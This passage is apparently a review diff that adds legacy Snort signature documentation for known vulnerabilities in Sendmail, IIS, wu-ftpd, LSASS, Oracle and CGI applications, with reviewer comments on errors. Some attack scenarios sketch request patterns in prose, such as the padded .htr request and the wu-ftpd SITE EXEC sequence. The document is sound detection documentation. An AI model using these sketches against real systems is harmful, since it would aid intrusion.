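Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") and the Attack Scenarios text about supplying credentials are generic CGI boilerplate that do not describe a remote file include through "dateiPfad"; replace them with the actual mechanism (an attacker-supplied URL in the parameter is included and executed by the PHP interpreter). Also fix "running ona web server" to "running on a web server" and the redundant "exploitation attempt has been attempted" in the Summary, add the missing blank line between "100000746" and the following "--" to match the other files, and cite the advisory this rule was written from in the empty Additional References section.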
--- /dev/null
+++ b/doc/signatures/2261.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2261
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
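Review bot: Affected Systems says "All systems using Sendmail." while Detailed Information scopes the flaw to "Sendmail prior to version 8.12.9"; make the two agree, e.g. "Sendmail versions prior to 8.12.9 and vendor builds that bundle them". "verison" in Corrective Action should be "version", and Additional References is empty even though a named, versioned prescan() bug like this has a vendor advisory and a CVE entry that should be cited so the reader can confirm the fixed version.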
--- /dev/null
+++ b/doc/signatures/1021.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+Sid:
+1021
+
+--
+
+Summary:
+This event is generated when an attempt is made to retrieve file
+contents by exploiting a vulnerability in Microsoft Internet 
+Information Server (IIS) ISAPI component.
+
+--
+Impact:
+Information Disclosure.
+
+--
+Detailed Information:
+Default installations of IIS 4.0 and IIS 5.0 contain a vulnerability in
+ISM.DLL that can allow an attacker to retrieve the contents of
+files on the system.  This could be used to retrieve web application
+source code or the contents of other sensitive files.
+
+--
+Affected Systems:
+	Microsoft IIS 4.0 and 5.0
+	Multiple vendor implementations of IIS.
+
+--
+Attack Scenarios:
+The attacker sends a URL containing the file to be retrieved (without the
+extension), followed by approximately 230 "%20" (ascii space) characters 
+followed by ".htr".
+
+Note: This attempt can only be performed once. The server must be
+restarted to make another sucessful request.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Check server logs for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE:   CAN-2000-0457
+Bugtraq:  BID 1193
+
+--
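Review bot: the Corrective Action "Check server logs for signs of compromise." omits the fix; since CAN-2000-0457 and BID 1193 are cited, the section should tell the reader to apply the Microsoft patch for the ISM.DLL .htr issue, or remove the .htr application mapping if it is not needed. Formatting: this file drops the "--" separator between "Rule:" and "Sid:" and titles the last section "References:" where every other file uses "Additional References:"; also fix "sucessful" and "unkown".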
--- /dev/null
+++ b/doc/signatures/344.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+
+344
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a 
+vulnerability in Wu-ftpd.
+
+--
+Impact:
+
+Serious. Full system compromise is possible.
+
+--
+Detailed Information:
+Some versions of Wu-ftpd contain an exploitable vulnerability in SITE 
+EXEC command, which can trigger a buffer overflow enabling an attacker 
+to gain root privileges. Anonymous access is enough for this exploit to 
+work.
+
+--
+Affected Systems:
+
+	Any version of Linux running wu-ftpd 2.6.0 and lower
+
+--
+Attack Scenarios:
+An attacker tries to connect to the server on port 21 anonymously. Then 
+he creates special directories using the MKD (make directory) command, 
+and then change its current FTP path into them using the CWD (change 
+current directory) command followed by a SITE EXEC on that directory. 
+
+
+--
+Ease of Attack:
+
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+Disable anonymous FTP access to your site.
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2000-13.html
+
+--
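Review bot: Affected Systems limits this to "Any version of Linux running wu-ftpd 2.6.0 and lower", but nothing in Detailed Information ties the SITE EXEC overflow to Linux and wu-ftpd is shipped on many UNIX platforms; the line should read "Any system running wu-ftpd 2.6.0 and lower" unless a Linux-only limitation is documented. Also fix the grammar in Attack Scenarios ("and then change its current FTP path" should be "changes"), and the stray blank lines after "Sid:" and "Impact:" break the field layout used by the other files.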
--- /dev/null
+++ b/doc/signatures/2514.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2514
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
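Review bot: fix "suscessful" in Detailed Information and "attcker" in Attack Scenarios, and add a full stop after "Apply the appropriate vendor supplied patches". Additional References is empty; an LSASS overflow affecting "Windows 2000, 2003 and XP" has a Microsoft security bulletin that should be cited so the reader can locate the patch the Corrective Action refers to. "Ease of Attack: Moderate." is also hard to square with an unauthenticated, remotely reachable unchecked buffer as described; if public exploit code exists the entry should say so, as the other files do.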
--- /dev/null
+++ b/doc/signatures/1321.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid: 1321
+
+--
+Summary:
+This event is generated when packets on the network have the Time To 
+Live (TTL) set to 0.
+
+--
+Impact:
+Improper use of IP multicasting by an application causing anomalous 
+behaviour on the network. This may have a detrimental effect on network 
+devices.
+
+--
+Detailed Information:
+Under normal circumstances the TTL should not be 0.
+
+This may be the result of a poorly designed application sending a TTL of 0 using Winsock.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Windows 95
+	Windows NT 3.5 and 3.51
+
+--
+Attack Scenarios:
+The application may be using a flaw in some versions of Winsock that 
+allow multicast packets to have a TTL of 0.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb\;EN-US\;q138268
+http://support.microsoft.com/default.aspx?scid=kb;EN-US;131978
+
+--
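Review bot: the third paragraph of Detailed Information begins mid-sentence ("an indicator of unauthorized network use, reconnaisance activity or system compromise. These rules may also...") and reads like a fragment pasted from another entry; either restore its opening clause or drop it, and fix "reconnaisance". The two Microsoft KB URLs are inconsistent: the first escapes the semicolons as "kb\;EN-US\;q138268" while the second does not, so one of them is wrong as written. Finally, Impact says TTL 0 traffic "may have a detrimental effect on network devices" while Affected Systems lists only Windows 95 and NT 3.5x; say whether Affected Systems means the hosts that emit the bad packets or the devices harmed by them.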
--- /dev/null
+++ b/doc/signatures/1208.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1208
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
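Review bot: every section in this file is generic CGI boilerplate; nothing names the script, parameter or product that SID 1208 actually matches, so an analyst cannot tell what the alert means or what to patch. The Summary and Detailed Information should state the URI the rule looks for, and Affected Systems should name the product rather than "All systems running CGI applications". Also fix "running ona web server".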
--- /dev/null
+++ b/doc/signatures/1439.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1439
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Content type reference:
+http://reliableanswers.com/contenttype/CType.asp?page=6&ord=
+
+--
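Review bot: the Corrective Action section is empty; given the Impact text about policy violation and the malicious-download scenario in Attack Scenarios, it should at least state the obvious measures (restrict or block the application at the perimeter in line with policy, keep the client patched, scan downloaded files). The single reference is a generic content-type table that does not identify which application or MIME type SID 1439 detects; the Summary should name the application.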
--- /dev/null
+++ b/doc/signatures/2855.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2855
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure remove_master_databases
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
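Review bot: Detailed Information has a hard line break before the full stop, leaving the orphaned line ". This procedure is included in" after "remove_master_databases"; join it to the preceding line. "Oracle Oracle9i" in Affected Systems duplicates the word. The body text is otherwise identical to the other dbms_repcat entries (see 2726.txt), so the Summary should name the package and procedure ("dbms_repcat.remove_master_databases") to make the per-procedure files distinguishable, and Additional References should cite the Oracle alert the "vendor supplied patch" comes from.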
--- /dev/null
+++ b/doc/signatures/712.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+712
+
+--
+Summary:
+This event is generated when an attempt is made to set an environment
+variable in a Telnet session to a server.
+
+--
+Impact:
+Unauthorized superuser access.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use the environment
+variable ld_library_path in a Telnet session.
+
+--
+Affected Systems:
+	Telnet servers.
+
+--
+Attack Scenarios:
+An attacker can attempt to set the environment variable ld_library_path
+and then attempt to exploit a known vulnerability in some SunOS based
+systems.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use ssh as an alternative to Telnet
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/43
+
+--
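Review bot: the variable is written "ld_library_path" but the dynamic loader variable is LD_LIBRARY_PATH (uppercase); the documentation should use the real name even if the rule matches case-insensitively. Affected Systems says "Telnet servers." while Attack Scenarios narrows this to "some SunOS based systems" (BID 43); make the two consistent, and have Detailed Information explain why setting this variable through the Telnet environment option is dangerous, since at present it only restates the Summary.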
--- /dev/null
+++ b/doc/signatures/2925.txt
@@ -0,0 +1,68 @@
+Rule: 
+
+--
+Sid: 
+2925
+
+-- 
+Summary: 
+This event is generated when an image fitting the profile of a web bug
+has been detected in network traffic.
+
+-- 
+
+Impact: 
+Information disclosure.
+
+--
+Detailed Information:
+Web bugs are 1x1 pixel image files that are found in web pages or HTML
+email. These are often used to monitor and track a users activity on the
+web. Information such as the browsers IP address, cookie information,
+time, browser version and other user identifiable charateristics can be
+collected using web bugs.
+
+This rule identifies an image that conforms to the usual size and format
+of a web bug.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios: 
+An attacker can use this type of image in an HTML email or on a web
+page to gather information about the host and user. Since these images
+can be not only small but transparent, they are almost undetectable in
+HTML pages.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Disallow the use of HTML email
+
+Use a web proxy server to strip all web bug images from server
+responses.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
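Review bot: "False Positives: None known." is not credible given that Detailed Information says the rule fires on any image "that conforms to the usual size and format of a web bug"; 1x1 images are widely used as layout spacers on ordinary pages, so legitimate traffic will trigger this and the section should say so. Also fix "charateristics" and the missing possessives ("a user's activity", "the browser's IP address"), and remove the stray blank line between "--" and "Impact:".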
--- /dev/null
+++ b/doc/signatures/185.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+185
+
+--
+Summary:
+CDK is a Trojan Horse offering the attacker control of the victim host. 
+This event is generated when an attacker connects to a victim server.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Restore a previously known good copy of the registry.
+
+A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Original rule written by Paul Bobby <paul.bobby@lmco.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS263
+
+--
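Review bot: the Contributors section lists "Sourcefire Research Team" and "Nigel Houghton" twice and names two different original rule writers (Max Vision and Paul Bobby); two contributor blocks appear to have been pasted together and should be merged. The file also has no "Affected Systems:" heading; the OS list sits under Detailed Information, which otherwise says nothing about how CDK behaves or what port or traffic the rule matches. Corrective Action should include removing the Trojan (or rebuilding the host) rather than only restoring the registry and rebooting.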
--- /dev/null
+++ b/doc/signatures/623.txt
@@ -0,0 +1,67 @@
+Rule:
+--
+Sid:
+623
+--
+Summary:
+A tcp packet with none of it's control bits set was detected.
+
+--
+Impact:
+Information regarding firewall rulesets, open/closed ports, ACLs, and
+possibly even OS type is possible.  This technique can also be used to
+bypass certain firewalls or traffic filtering/shaping devices.
+
+--
+Detailed Information:
+A tcp packet with none of it's control bits (URG, ACK, PSH, RST, SYN,
+FIN) was detected.  Additionally, both the sequence number and
+acknowledgement number were set to 0.  An open port will generally not
+respond at all, whereas a closed port will generally respond with an
+ACK RST.  The particular response varies between operating systems,
+and is also governed by any filtering that may be done between the two
+hosts.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of information gathering leading up to another (more directed)
+attack, an attacker may attempt to figure out what ports are
+open/closed on a remote machine.
+
+--
+Ease of Attack:
+Intermediate.  To initiate an attack of this type, an attacker either
+needs a tool that can send tcp packets with no control bits  set or
+the ability to craft their own packets.  The former is easy, the later
+requires a more advanced skillset.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine if this particular port would have responded as being open
+or closed.  If open, watch for more attacks on this particular service
+or from the remote machine that sent the packet.  If closed, simply
+watch for more traffic from this host.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+--
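Review bot: "it's" should be "its" in both the Summary and Detailed Information, and "the later" in Ease of Attack should be "the latter". The Affected Systems section is empty; for a null-flags probe it should say "All" or list the stacks whose replies differ, since Detailed Information already notes that the response "varies between operating systems". The Ease of Attack text also argues against its own rating: it calls the tool route "easy" and only hand-crafting packets "a more advanced skillset", which supports "Simple" for an attacker who uses a tool rather than "Intermediate".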
--- /dev/null
+++ b/doc/signatures/1023.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1023
+
+--
+Summary:
+This event is generated when an attempt is made to access the msadcs.dll file, which provides an interface to Remote Data Services (RDS).
+
+--
+Impact:
+Information gathering or remote access. This attack may allow disclosure of file contents or may allow remote access to the vulnerable server. 
+
+--
+Detailed Information:
+Microsoft Data Access Components (MDAC) provides web and database integration.  The RDS component of MDAC enables remote web access to database services through the Internet Information Server (IIS).  A vulnerability exists in the DataFactory component of RDS that may permit unauthenticated users to query databases.  Depending on other software installed, it may be possible to execute arbitrary commands on IIS. 
+
+--
+Affected Systems:
+IIS 3.0, 4.0 servers 
+
+--
+Attack Scenarios:
+An attacker can exploit the vulnerability to get access to remote databases or, under certain software configurations, get access to the remote IIS server to run arbitrary commands. 
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Follow the configuration changes in the referenced Microsoft link.
+
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1011
+
+Bugtraq.
+http://www.securityfocus.com/bid/529
+
+Microsoft 
+http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
+
+
+--
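Review bot: the Summary says the event fires on any "attempt to access the msadcs.dll file", so a legitimate RDS client talking to an IIS 3.0/4.0 server will also trigger it; "False Positives: None Known." should note this and tell the analyst to look for the DataFactory query described in Detailed Information before treating the alert as an attack. Minor: the reference labels are inconsistent ("CVE", "Bugtraq.", "Microsoft " with trailing space) and there are whitespace-only lines before the "--" separators.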
--- /dev/null
+++ b/doc/signatures/976.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+976
+
+--
+Summary:
+This event is generated when an attempt is made to reference a .bat file to execute arbitrary commands on an Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can execute arbitrary commands on the IIS server with the privileges of the user running IIS.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) uses .bat and .cmd to execute code using the Common Gateway Interface (CGI).  A .bat file or .cmd file can be passed a malicious command to be executed on the server.  This is accomplished by preceding the malicious command with an ampersand.  This allows execution of arbitrary commands with the privileges of the user running IIS.
+
+--
+Affected Systems:
+Hosts running IIS 1.0
+
+--
+Attack Scenarios:
+An attacker can pass a .bat or .cmd file a malicious command to be executed.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://support.microsoft.com/support/kb/articles/Q148/1/88.asp
+http://support.microsoft.com/support/kb/articles/Q155/0/56.asp
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0233
+
+Bugtraq
+http://www.securityfocus.com/bid/2023
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10362
+
+--
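Review bot: the Summary says the rule triggers on an "attempt to reference a .bat file", but Detailed Information says the attack depends on an ampersand preceding the injected command; state whether the rule matches any .bat or .cmd request or only ones carrying the "&", so the analyst knows whether ordinary .bat CGI use will alert (and if it will, False Positives should not read "None Known"). Also "Microsoft Internet Information Service (IIS)" should be "Services", and "Hosts running IIS 1.0" in Affected Systems should be checked against the cited KB articles and CAN-1999-0233 in case further versions are listed there.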
--- /dev/null
+++ b/doc/signatures/466.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+466
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running the L3 "Retriever 1.5" security scanner.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running the L3 "Retriever 1.5" security scanner contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS311
+
+--
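Review bot: "legimately" in False Positives should be "legitimately", and there is a missing space in "Steven Alexander<alexander.s@mccd.edu>". The Corrective Action "Block inbound ICMP echo requests." is broader than the finding; Detailed Information says the rule keys on a payload unique to the L3 Retriever 1.5 scanner, so the guidance should be to treat the source as a scanning host and watch for follow-on activity rather than to block all echo requests. The reference also lacks the "Whitehats arachNIDS" label used in the other files.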
--- /dev/null
+++ b/doc/signatures/2726.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2726
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_number
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
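Review bot: same defects as 2855.txt: the orphaned line ". This procedure is included in" after "add_priority_number" should be joined to the previous line, and "Oracle Oracle9i" duplicates the word. Because the body text is identical across the dbms_repcat files, the Summary should name the package and procedure ("dbms_repcat.add_priority_number") so the two entries can be told apart without reading to the third paragraph; Additional References is empty and should cite the Oracle alert.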
--- /dev/null
+++ b/doc/signatures/1723.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1723
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
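Review bot: this file is word-for-word the generic CGI text of 1208.txt; nothing identifies what SID 1723 matches (script name, parameter, product), so the Summary, Detailed Information and Affected Systems need to be made specific or the entry tells the analyst nothing. Also fix "running ona web server".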
--- /dev/null
+++ b/doc/signatures/100000694.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000694
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VCard PRO" application running on a webserver. Access to the file "gbrowse.php" with SQL commands being passed as the "cat_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "cat_id" parameter in the "gbrowse.php" script used by the "VCard PRO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
